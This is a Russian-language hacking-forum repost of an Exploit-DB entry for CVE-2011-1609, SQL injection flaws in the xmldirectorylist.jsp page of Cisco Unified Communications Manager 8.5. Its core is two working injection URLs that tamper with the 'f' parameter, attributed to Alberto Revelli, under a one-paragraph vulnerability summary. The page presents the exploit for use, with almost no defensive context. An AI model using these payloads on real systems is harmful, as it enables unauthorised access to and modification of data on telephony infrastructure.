Cisco Unified Communications Manager 8.5 - 'xmldirectorylist.jsp' Multiple SQL Injections | Gerki

Exploiter

Хакер

21 Дек 2022

EDB-ID: 35672

Проверка EDB

Пройдено

Автор: ALBERTO REVELLI

Тип уязвимости: WEBAPPS

Платформа: JSP

CVE: cve-2011-1609

Дата публикации: 2011-04-27

Код:

source: https://www.securityfocus.com/bid/47607/info

Cisco Unified Communications Manager is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an authenticated attacker to compromise the affected device, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/ccmcip/xmldirectorylist.jsp?f=vsr'||0/1%20OR%201=1))%20--
http://www.example.com/ccmcip/xmldirectorylist.jsp?f=vsr'||1/0%20OR%201=1))%20--

Источник: www.exploit-db.com

Поиск

Exploit Cisco Unified Communications Manager 8.5 - 'xmldirectorylist.jsp' Multiple SQL Injections

Exploiter

Похожие темы